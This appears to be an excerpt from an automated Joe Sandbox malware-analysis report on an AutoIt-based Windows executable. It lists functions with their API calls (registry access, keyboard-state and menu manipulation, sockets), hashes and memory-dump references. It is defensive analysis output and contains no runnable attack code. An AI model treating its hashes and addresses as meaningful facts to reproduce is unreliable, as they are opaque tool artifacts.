                                                                          • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                          Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                          • String ID:
                                                                          • API String ID: 4082120231-0
                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                          Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2027346449-0
                                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                          Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetMenu.USER32 ref: 0047A703
                                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3257027151-0
                                                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                          Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastselect
                                                                          • String ID:
                                                                          • API String ID: 215497628-0
                                                                          • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                          • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                          Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 0044443B
                                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                          Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00444633
                                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                          Function 0047DDC2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 170COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __snwprintf__wcsicoll_wcscpy
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                          • API String ID: 1729044348-3025626884
                                                                          • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                          • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                          • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                          • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                          Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                          • String ID:
                                                                          • API String ID: 2354583917-0
                                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                          Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                          Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                          • String ID:
                                                                          • API String ID: 896007046-0
                                                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                          Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                          • GetFocus.USER32 ref: 00448ACF
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                          • String ID:
                                                                          • API String ID: 3429747543-0
                                                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                          Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 3300667738-0
                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                          Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu$\VH
                                                                          • API String ID: 3164766367-2432546070
                                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
